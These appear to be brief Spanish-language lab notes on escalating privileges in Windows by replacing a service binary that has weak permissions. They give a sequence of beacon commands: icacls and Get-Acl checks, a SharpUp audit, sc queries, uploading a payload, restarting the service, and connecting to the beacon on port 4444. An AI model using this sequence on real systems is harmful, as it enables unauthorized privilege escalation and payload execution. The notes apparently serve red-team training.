Weak Service Binary Permissions

Identificar servicios vulnerables.

run icacls "C:\Program Files\Vulnerable Service3\Service3.exe"
powershell Get-Acl -Path "C:\Program Files\Vulnerable Service3" | fl

execute-assembly C:\Tools\SharpUp.exe audit ModifiableServicesBinaries

Verificar las caracteristicas del servicio.

run sc qc "Vulnerable Service 3"

Creamos un payload y lo subimos a la maquina victima.

upload C:\Tools\Payloads\Service3.exe

Iniciar servicio.

run sc stop "Vulnerable Service 3"
run sc start "Vulnerable Service 3"

Acceder al beacon.

connect localhost 4444